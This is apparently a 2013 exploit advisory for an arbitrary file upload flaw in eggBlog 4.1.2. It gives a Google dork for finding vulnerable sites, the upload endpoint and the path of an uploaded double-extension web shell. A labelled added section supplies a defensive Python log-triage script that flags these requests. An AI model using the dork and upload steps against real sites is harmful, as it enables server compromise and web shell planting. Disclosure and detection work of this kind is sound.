eggBlog Arbitrary File Upload Vulnerability

2013.05.01
Credit: Pokk3rs
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: eggBlog Arbitrary File Upload Vulnerability
# Google Dork:"powered by eggBlog.net"
# Date: 28/04/2013
# Exploit Author: Pokk3rs
# Vendor Homepage: http://eggblog.net/
# Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/
# Tested on: Win8 Pro x64

Expl0itation

1 - Google Dork:"powered by eggBlog.net"
2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
3 - http://server/[path]/photos/uploads/shell.php.jpg
#
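Added example, not part of the original advisory or of eggBlog's code: a log triage script that flags POSTs to the upload handler named in step 2 and requests for files under photos/uploads whose name carries a script extension in any position, as in step 3. The Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Extensions a PHP-enabled server may pass to the interpreter (assumed list).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
UPLOAD_DIR = "/photos/uploads/"  # path from step 3 of the advisory
UPLOAD_ENDPOINT = "/_lib/openwysiwyg/addons/imagelibrary/insert_image.php"  # step 2

# Combined Log Format (assumed): client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def has_script_component(filename):
    """True if any dot-separated part after the base name is a script extension."""
    parts = filename.lower().split(".")[1:]
    return any(p in SCRIPT_EXTS for p in parts)

def classify(line):
    """Return (client, reason) for a log line worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, _status = m.groups()
    # Drop the query string and decode percent-escapes before inspecting the path.
    path = unquote(target.split("?", 1)[0])
    if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
        return (client, "POST to image library upload handler")
    if UPLOAD_DIR in path:
        name = path.rsplit("/", 1)[1]
        if has_script_component(name):
            return (client, "script extension in uploaded file name: " + name)
    return None

def scan(lines):
    """Classify every line and keep only the hits, in input order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [28/Apr/2013:10:00:01 +0000] "GET /blog/photos/uploads/holiday.jpg HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Apr/2013:10:02:13 +0000] "POST /blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= HTTP/1.1" 200 812',
    '198.51.100.7 - - [28/Apr/2013:10:02:20 +0000] "GET /blog/photos/uploads/shell.php.jpg HTTP/1.1" 200 64',
    '203.0.113.5 - - [28/Apr/2013:10:05:00 +0000] "GET /blog/photos/uploads/a%2Ephtml HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE):
        print(client, reason)
```

A POST to the handler can be a legitimate editor upload, so treat that hit as a lead to correlate with the file-name hits from the same client.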

References:

http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/
http://eggblog.net/



Copyright 2017, cxsecurity.com